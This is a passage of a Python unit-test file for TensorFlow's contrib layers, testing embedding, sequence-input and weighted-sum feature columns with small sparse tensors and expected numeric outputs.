combiner="sum",
initializer=init_ops.ones_initializer())
output = tf.contrib.layers.input_from_feature_columns(features,
[embeded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
# score: (number of values)
self.assertAllEqual(output.eval(), [[1.], [2.], [0.]])
def testEmbeddingColumnWithMaxNormForDNN(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[3, 2])
features = {"wire": wire_tensor}
embedded_sparse = tf.contrib.layers.embedding_column(
hashed_sparse,
1,
combiner="sum",
initializer=init_ops.ones_initializer(),
max_norm=0.5)
output = tf.contrib.layers.input_from_feature_columns(features,
[embedded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
# score: (number of values * 0.5)
self.assertAllClose(output.eval(), [[0.5], [1.], [0.]])
def testEmbeddingColumnWithWeightedSparseColumnForDNN(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[3, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[3, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(
weighted_ids,
1,
combiner="sum",
initializer=init_ops.ones_initializer())
output = tf.contrib.layers.input_from_feature_columns(features,
[embeded_sparse])
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
# score: (sum of weights)
self.assertAllEqual(output.eval(), [[10.], [50.], [0.]])
def testInputLayerWithCollectionsForDNN(self):
real_valued = tf.contrib.layers.real_valued_column("price")
bucket = tf.contrib.layers.bucketized_column(real_valued,
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
tf.contrib.layers.input_from_feature_columns(
features, [real_valued, bucket, embeded_sparse],
weight_collections=["my_collection"])
weights = tf.get_collection("my_collection")
# one variable for embeded sparse
self.assertEqual(1, len(weights))
def testInputLayerWithTrainableArgForDNN(self):
real_valued = tf.contrib.layers.real_valued_column("price")
bucket = tf.contrib.layers.bucketized_column(real_valued,
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
features = {
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
tf.contrib.layers.input_from_feature_columns(
features, [real_valued, bucket, embeded_sparse],
weight_collections=["my_collection"],
trainable=False)
# There should not be any trainable variables
self.assertEqual(0, len(tf.trainable_variables()))
tf.contrib.layers.input_from_feature_columns(
features, [real_valued, bucket, embeded_sparse],
weight_collections=["my_collection"],
trainable=True)
# There should one trainable variable for embeded sparse
self.assertEqual(1, len(tf.trainable_variables()))
class SequenceInputFromFeatureColumnTest(tf.test.TestCase):
def testSupportedColumns(self):
measurement = tf.contrib.layers.real_valued_column("measurements")
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", 100)
pets = tf.contrib.layers.sparse_column_with_hash_bucket(
"pets", 100)
ids = tf.contrib.layers.sparse_column_with_integerized_feature(
"id", 100)
country_x_pets = tf.contrib.layers.crossed_column(
[country, pets], 100)
country_x_pets_onehot = tf.contrib.layers.one_hot_column(
country_x_pets)
bucketized_measurement = tf.contrib.layers.bucketized_column(
measurement, [.25, .5, .75])
embedded_id = tf.contrib.layers.embedding_column(
ids, 100)
# `_BucketizedColumn` is not supported.
self.assertRaisesRegexp(
ValueError,
"FeatureColumn type _BucketizedColumn is not currently supported",
tf.contrib.layers.sequence_input_from_feature_columns,
{}, [measurement, bucketized_measurement])
# `_CrossedColumn` is not supported.
self.assertRaisesRegexp(
ValueError,
"FeatureColumn type _CrossedColumn is not currently supported",
tf.contrib.layers.sequence_input_from_feature_columns,
{}, [embedded_id, country_x_pets])
# `country_x_pets_onehot` depends on a `_CrossedColumn` which is forbidden.
self.assertRaisesRegexp(
ValueError,
"Column country_X_pets .* _CrossedColumn",
tf.contrib.layers.sequence_input_from_feature_columns,
{}, [embedded_id, country_x_pets_onehot])
def testRealValuedColumn(self):
batch_size = 4
sequence_length = 8
dimension = 3
np.random.seed(1111)
measurement_input = np.random.rand(batch_size, sequence_length, dimension)
measurement_column = tf.contrib.layers.real_valued_column("measurements")
columns_to_tensors = {"measurements": tf.constant(measurement_input)}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [measurement_column])
with self.test_session() as sess:
model_inputs = sess.run(model_input_tensor)
self.assertAllClose(measurement_input, model_inputs)
def testRealValuedColumnWithExtraDimensions(self):
batch_size = 4
sequence_length = 8
dimensions = [3, 4, 5]
np.random.seed(2222)
measurement_input = np.random.rand(batch_size, sequence_length, *dimensions)
measurement_column = tf.contrib.layers.real_valued_column("measurements")
columns_to_tensors = {"measurements": tf.constant(measurement_input)}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [measurement_column])
expected_shape = [batch_size, sequence_length, np.prod(dimensions)]
reshaped_measurements = np.reshape(measurement_input, expected_shape)
with self.test_session() as sess:
model_inputs = sess.run(model_input_tensor)
self.assertAllClose(reshaped_measurements, model_inputs)
def testRealValuedColumnWithNormalizer(self):
batch_size = 4
sequence_length = 8
dimension = 3
normalizer = lambda x: x - 2
np.random.seed(3333)
measurement_input = np.random.rand(batch_size, sequence_length, dimension)
measurement_column = tf.contrib.layers.real_valued_column(
"measurements", normalizer=normalizer)
columns_to_tensors = {"measurements": tf.constant(measurement_input)}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [measurement_column])
with self.test_session() as sess:
model_inputs = sess.run(model_input_tensor)
self.assertAllClose(normalizer(measurement_input), model_inputs)
def testRealValuedColumnWithMultiDimensionsAndNormalizer(self):
batch_size = 4
sequence_length = 8
dimensions = [3, 4, 5]
normalizer = lambda x: x / 2.0
np.random.seed(1234)
measurement_input = np.random.rand(batch_size, sequence_length, *dimensions)
measurement_column = tf.contrib.layers.real_valued_column(
"measurements", normalizer=normalizer)
columns_to_tensors = {"measurements": tf.constant(measurement_input)}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [measurement_column])
expected_shape = [batch_size, sequence_length, np.prod(dimensions)]
reshaped_measurements = np.reshape(measurement_input, expected_shape)
with self.test_session() as sess:
model_inputs = sess.run(model_input_tensor)
self.assertAllClose(normalizer(reshaped_measurements), model_inputs)
def testOneHotColumnFromSparseColumnWithKeys(self):
ids_tensor = tf.SparseTensor(
values=["c", "b",
"a", "c", "b",
"b"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
ids_column = tf.contrib.layers.sparse_column_with_keys(
"ids", ["a", "b", "c", "unseen"])
one_hot_column = tf.contrib.layers.one_hot_column(ids_column)
columns_to_tensors = {"ids": ids_tensor}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [one_hot_column])
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input = sess.run(model_input_tensor)
expected_input_shape = np.array([4, 3, 4])
expected_model_input = np.array(
[[[0, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 0]],
[[1, 0, 1, 0], [0, 1, 0, 0], [0, 0, 0, 0]],
[[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]],
[[0, 0, 0, 0], [0, 0, 0, 0], [0, 1, 0, 0]]], dtype=np.float32)
self.assertAllEqual(expected_input_shape, model_input.shape)
self.assertAllClose(expected_model_input, model_input)
def testOneHotColumnFromSparseColumnWithHashBucket(self):
hash_buckets = 10
ids_tensor = tf.SparseTensor(
values=["c", "b",
"a", "c", "b",
"b"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
hashed_ids_column = tf.contrib.layers.sparse_column_with_hash_bucket(
"ids", hash_buckets)
one_hot_column = tf.contrib.layers.one_hot_column(hashed_ids_column)
columns_to_tensors = {"ids": ids_tensor}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [one_hot_column])
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input = sess.run(model_input_tensor)
expected_input_shape = np.array([4, 3, hash_buckets])
self.assertAllEqual(expected_input_shape, model_input.shape)
def testEmbeddingColumn(self):
hash_buckets = 10
embedding_dimension = 5
ids_tensor = tf.SparseTensor(
values=["c", "b",
"a", "c", "b",
"b"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
expected_input_shape = np.array([4, 3, embedding_dimension])
hashed_ids_column = tf.contrib.layers.sparse_column_with_hash_bucket(
"ids", hash_buckets)
embedded_column = tf.contrib.layers.embedding_column(
hashed_ids_column, embedding_dimension)
columns_to_tensors = {"ids": ids_tensor}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, [embedded_column])
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input = sess.run(model_input_tensor)
self.assertAllEqual(expected_input_shape, model_input.shape)
def testEmbeddingColumnGradient(self):
hash_buckets = 1000
embedding_dimension = 3
ids_tensor = tf.SparseTensor(
values=["c", "b",
"a", "c", "b",
"b"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
hashed_ids_column = tf.contrib.layers.sparse_column_with_hash_bucket(
"ids", hash_buckets)
embedded_column = tf.contrib.layers.embedding_column(
hashed_ids_column, embedding_dimension, combiner="sum")
columns_to_tensors = {"ids": ids_tensor}
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors,
[embedded_column],
weight_collections=["my_collection"])
embedding_weights = tf.get_collection("my_collection")
gradient_tensor = tf.gradients(model_input_tensor, embedding_weights)
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input, gradients = sess.run([model_input_tensor, gradient_tensor])
expected_input_shape = [4, 3, embedding_dimension]
self.assertAllEqual(expected_input_shape, model_input.shape)
# `ids_tensor` consists of 7 instances of <empty>, 3 occurences of "b",
# 2 occurences of "c" and 1 instance of "a".
expected_gradient_values = sorted([0., 3., 2., 1.] * embedding_dimension)
actual_gradient_values = np.sort(gradients[0].values, axis=None)
self.assertAllClose(expected_gradient_values, actual_gradient_values)
def testMultipleColumns(self):
batch_size = 4
sequence_length = 3
measurement_dimension = 5
country_hash_size = 10
max_id = 200
id_embedding_dimension = 11
normalizer = lambda x: x / 10.0
measurement_tensor = tf.random_uniform(
[batch_size, sequence_length, measurement_dimension])
country_tensor = tf.SparseTensor(
values=["us", "ca",
"ru", "fr", "ca",
"mx"],
indices=[[0, 0, 0], [0, 1, 0],
[1, 0, 0], [1, 0, 1], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
id_tensor = tf.SparseTensor(
values=[2, 5,
26, 123, 1,
0],
indices=[[0, 0, 0], [0, 0, 1], [0, 1, 1],
[1, 0, 0], [1, 1, 0],
[3, 2, 0]],
shape=[4, 3, 2])
columns_to_tensors = {"measurements": measurement_tensor,
"country": country_tensor,
"id": id_tensor}
measurement_column = tf.contrib.layers.real_valued_column(
"measurements", normalizer=normalizer)
country_column = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", country_hash_size)
id_column = tf.contrib.layers.sparse_column_with_integerized_feature(
"id", max_id)
onehot_country_column = tf.contrib.layers.one_hot_column(country_column)
embedded_id_column = tf.contrib.layers.embedding_column(
id_column, id_embedding_dimension)
model_input_columns = [measurement_column,
onehot_country_column,
embedded_id_column]
model_input_tensor = tf.contrib.layers.sequence_input_from_feature_columns(
columns_to_tensors, model_input_columns)
self.assertEqual(tf.float32, model_input_tensor.dtype)
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
model_input = sess.run(model_input_tensor)
expected_input_shape = [
batch_size,
sequence_length,
measurement_dimension + country_hash_size + id_embedding_dimension]
self.assertAllEqual(expected_input_shape, model_input.shape)
class WeightedSumTest(tf.test.TestCase):
def testSparseColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [hashed_sparse], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testSparseIntColumn(self):
"""Tests a sparse column with int values."""
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket(
"wire", 10, dtype=tf.int64)
wire_tensor = tf.SparseTensor(values=[101, 201, 301],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [hashed_sparse], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testSparseColumnWithDenseInputTensor(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.constant([["omar", "stringer"], ["marlo", "rick"]])
features = {"wire": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [hashed_sparse], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testWeightedSparseColumn(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer"])
ids_tensor = tf.SparseTensor(values=["stringer", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.SparseTensor(values=[10.0, 20.0, 30.0],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"ids": ids_tensor,
"weights": weights_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [weighted_ids], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testWeightedSparseColumnWithDenseInputTensor(self):
ids = tf.contrib.layers.sparse_column_with_keys(
"ids", ["marlo", "omar", "stringer", "rick"])
ids_tensor = tf.constant([["omar", "stringer"], ["marlo", "rick"]])
weighted_ids = tf.contrib.layers.weighted_sparse_column(ids, "weights")
weights_tensor = tf.constant([[10.0, 20.0], [30.0, 40.0]])
features = {"ids": ids_tensor,
"weights": weights_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [weighted_ids], num_outputs=5)
with self.test_session():
tf.initialize_all_variables().run()
tf.initialize_all_tables().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testCrossedColumn(self):
a = tf.contrib.layers.sparse_column_with_hash_bucket("aaa",
hash_bucket_size=100)
b = tf.contrib.layers.sparse_column_with_hash_bucket("bbb",
hash_bucket_size=100)
crossed = tf.contrib.layers.crossed_column(
set([a, b]), hash_bucket_size=10000)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"aaa": wire_tensor, "bbb": wire_tensor}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [crossed], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [2, 5])
def testEmbeddingColumn(self):
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
wire_tensor = tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [1, 1]],
shape=[2, 2])
features = {"wire": wire_tensor}
embeded_sparse = tf.contrib.layers.embedding_column(hashed_sparse, 10)
with self.test_session():
with self.assertRaisesRegexp(
ValueError, "Error creating weighted sum for column: wire_embedding"):
tf.global_variables_initializer().run()
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[embeded_sparse],
num_outputs=5)
def testRealValuedColumnWithMultiDimensions(self):
real_valued = tf.contrib.layers.real_valued_column("price", 2)
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [real_valued], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [3, 5])
def testBucketizedColumnWithMultiDimensions(self):
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price", 2),
boundaries=[0., 10., 100.])
features = {"price": tf.constant([[20., 10.], [110, 0.], [-3, 30]])}
logits, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [bucket], num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(logits.eval().shape, [3, 5])
def testAllWideColumns(self):
real_valued = tf.contrib.layers.real_valued_column("income", 2)
bucket = tf.contrib.layers.bucketized_column(
tf.contrib.layers.real_valued_column("price"),
boundaries=[0., 10., 100.])
hashed_sparse = tf.contrib.layers.sparse_column_with_hash_bucket("wire", 10)
crossed = tf.contrib.layers.crossed_column([bucket, hashed_sparse], 100)
features = {
"income": tf.constant([[20., 10], [110, 0], [-3, 30]]),
"price": tf.constant([[20.], [110], [-3]]),
"wire": tf.SparseTensor(values=["omar", "stringer", "marlo"],
indices=[[0, 0], [1, 0], [2, 0]],
shape=[3, 1])
}
output, _, _ = tf.contrib.layers.weighted_sum_from_feature_columns(
features, [real_valued, bucket, hashed_sparse, crossed],
num_outputs=5)
with self.test_session():
tf.global_variables_initializer().run()
self.assertAllEqual(output.eval().shape, [3, 5])
def testPredictions(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"])
age = tf.contrib.layers.real_valued_column("age")
with tf.Graph().as_default():
features = {
"age": tf.constant([[1], [2]]),
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[age, language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllClose(output.eval(), [[0.], [0.]])
sess.run(bias.assign([0.1]))
self.assertAllClose(output.eval(), [[0.1], [0.1]])
# score: 0.1 + age*0.1
sess.run(column_to_variable[age][0].assign([[0.2]]))
self.assertAllClose(output.eval(), [[0.3], [0.5]])
# score: 0.1 + age*0.1 + language_weight[language_index]
sess.run(column_to_variable[language][0].assign([[0.1], [0.3], [0.2]]))
self.assertAllClose(output.eval(), [[0.5], [0.6]])
def testJointPredictions(self):
country = tf.contrib.layers.sparse_column_with_keys(
column_name="country",
keys=["us", "finland"])
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"])
with tf.Graph().as_default():
features = {
"country": tf.SparseTensor(values=["finland", "us"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}
output, variables, bias = (
tf.contrib.layers.joint_weighted_sum_from_feature_columns(
features, [country, language], num_outputs=1))
# Assert that only a single weight is created.
self.assertEqual(len(variables), 1)
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllClose(output.eval(), [[0.], [0.]])
sess.run(bias.assign([0.1]))
self.assertAllClose(output.eval(), [[0.1], [0.1]])
# shape is [5,1] because 1 class and 2 + 3 features.
self.assertEquals(variables[0].get_shape().as_list(), [5, 1])
# score: bias + country_weight + language_weight
sess.run(variables[0].assign([[0.1], [0.2], [0.3], [0.4], [0.5]]))
self.assertAllClose(output.eval(), [[0.8], [0.5]])
def testJointPredictionsWeightedFails(self):
language = tf.contrib.layers.weighted_sparse_column(
tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"]),
"weight")
with tf.Graph().as_default():
features = {
"weight": tf.constant([[1], [2]]),
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
}
with self.assertRaises(AssertionError):
tf.contrib.layers.joint_weighted_sum_from_feature_columns(
features, [language], num_outputs=1)
def testJointPredictionsRealFails(self):
age = tf.contrib.layers.real_valued_column("age")
with tf.Graph().as_default():
features = {
"age": tf.constant([[1], [2]]),
}
with self.assertRaises(NotImplementedError):
tf.contrib.layers.joint_weighted_sum_from_feature_columns(
features, [age], num_outputs=1)
def testPredictionsWithWeightedSparseColumn(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "finnish", "hindi"])
weighted_language = tf.contrib.layers.weighted_sparse_column(
sparse_id_column=language,
weight_column_name="age")
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"age": tf.SparseTensor(values=[10.0, 20.0],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [weighted_language], num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertAllClose(output.eval(), [[0.], [0.]])
sess.run(bias.assign([0.1]))
self.assertAllClose(output.eval(), [[0.1], [0.1]])
# score: bias + age*language_weight[index]
sess.run(column_to_variable[weighted_language][0].assign(
[[0.1], [0.2], [0.3]]))
self.assertAllClose(output.eval(), [[3.1], [2.1]])
def testPredictionsWithMultivalentColumnButNoCross(self):
language = tf.contrib.layers.sparse_column_with_keys(
column_name="language",
keys=["english", "turkish", "hindi"])
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["hindi", "english"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, bias = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
# score: 0.1 + language_weight['hindi'] + language_weight['english']
sess.run(bias.assign([0.1]))
sess.run(column_to_variable[language][0].assign([[0.1], [0.3], [0.2]]))
self.assertAllClose(output.eval(), [[0.4]])
def testSparseFeatureColumnWithHashedBucketSize(self):
movies = tf.contrib.layers.sparse_column_with_hash_bucket(
column_name="movies", hash_bucket_size=15)
with tf.Graph().as_default():
features = {
"movies": tf.SparseTensor(
values=["matrix", "head-on", "winter sleep"],
indices=[[0, 0], [0, 1], [1, 0]],
shape=[2, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(features,
[movies],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[movies][0]
self.assertEqual(weights.get_shape(), (15, 1))
sess.run(weights.assign(weights + 0.4))
# score for first example = 0.4 (matrix) + 0.4 (head-on) = 0.8
# score for second example = 0.4 (winter sleep)
self.assertAllClose(output.eval(), [[0.8], [0.4]])
def testCrossUsageInPredictions(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [1, 0]],
shape=[2, 1]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 1])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language][0]
sess.run(weights.assign(weights + 0.4))
self.assertAllClose(output.eval(), [[0.4], [0.4]])
def testCrossColumnByItself(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
language_language = tf.contrib.layers.crossed_column(
[language, language], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [language_language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[language_language][0]
sess.run(weights.assign(weights + 0.4))
# There are two features inside language. If we cross it by itself we'll
# have four crossed features.
self.assertAllClose(output.eval(), [[1.6]])
def testMultivalentCrossUsageInPredictions(self):
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=3)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=10)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country_language],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
weights = column_to_variable[country_language][0]
sess.run(weights.assign(weights + 0.4))
# There are four crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testMultivalentCrossUsageInPredictionsWithPartition(self):
# bucket size has to be big enough to allow sharding.
language = tf.contrib.layers.sparse_column_with_hash_bucket(
"language", hash_bucket_size=64 << 19)
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=64 << 18)
country_language = tf.contrib.layers.crossed_column(
[language, country], hash_bucket_size=64 << 18)
with tf.Graph().as_default():
features = {
"language": tf.SparseTensor(values=["english", "spanish"],
indices=[[0, 0], [0, 1]],
shape=[1, 2]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [0, 1]],
shape=[1, 2])
}
with tf.variable_scope(
"weighted_sum_from_feature_columns",
features.values(),
partitioner=tf.min_max_variable_partitioner(
max_partitions=10, min_slice_size=((64 << 20) - 1))) as scope:
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, language, country_language],
num_outputs=1,
scope=scope))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
self.assertEqual(2, len(column_to_variable[country]))
self.assertEqual(3, len(column_to_variable[language]))
self.assertEqual(2, len(column_to_variable[country_language]))
weights = column_to_variable[country_language]
for partition_variable in weights:
sess.run(partition_variable.assign(partition_variable + 0.4))
# There are four crosses each with 0.4 weight.
# score = 0.4 + 0.4 + 0.4 + 0.4
self.assertAllClose(output.eval(), [[1.6]])
def testRealValuedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
age = tf.contrib.layers.real_valued_column("age")
# The following RealValuedColumn has 3 dimensions.
incomes = tf.contrib.layers.real_valued_column("incomes", 3)
with tf.Graph().as_default():
features = {"age": tf.constant([[1], [1]]),
"incomes": tf.constant([[100., 200., 300.], [10., 20., 30.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, age, incomes],
num_outputs=1))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
incomes_weights = column_to_variable[incomes][0]
sess.run(incomes_weights.assign([[0.1], [0.2], [0.3]]))
self.assertAllClose(output.eval(), [[140.], [14.]])
def testMulticlassWithRealValuedColumnHavingMultiDimensions(self):
country = tf.contrib.layers.sparse_column_with_hash_bucket(
"country", hash_bucket_size=5)
age = tf.contrib.layers.real_valued_column("age")
# The following RealValuedColumn has 3 dimensions.
incomes = tf.contrib.layers.real_valued_column("incomes", 3)
with tf.Graph().as_default():
features = {"age": tf.constant([[1], [1]]),
"incomes": tf.constant([[100., 200., 300.], [10., 20., 30.]]),
"country": tf.SparseTensor(values=["US", "SV"],
indices=[[0, 0], [1, 0]],
shape=[2, 2])}
output, column_to_variable, _ = (
tf.contrib.layers.weighted_sum_from_feature_columns(
features, [country, age, incomes],
num_outputs=5))
with self.test_session() as sess:
tf.global_variables_initializer().run()
tf.initialize_all_tables().run()
incomes_weights = column_to_variable[incomes][0]
sess.run(incomes_weights.assign([[0.01, 0.1, 1., 10., 100.],
[0.02, 0.2, 2., 20., 200.],
[0.03, 0.3, 3., 30., 300.]]))
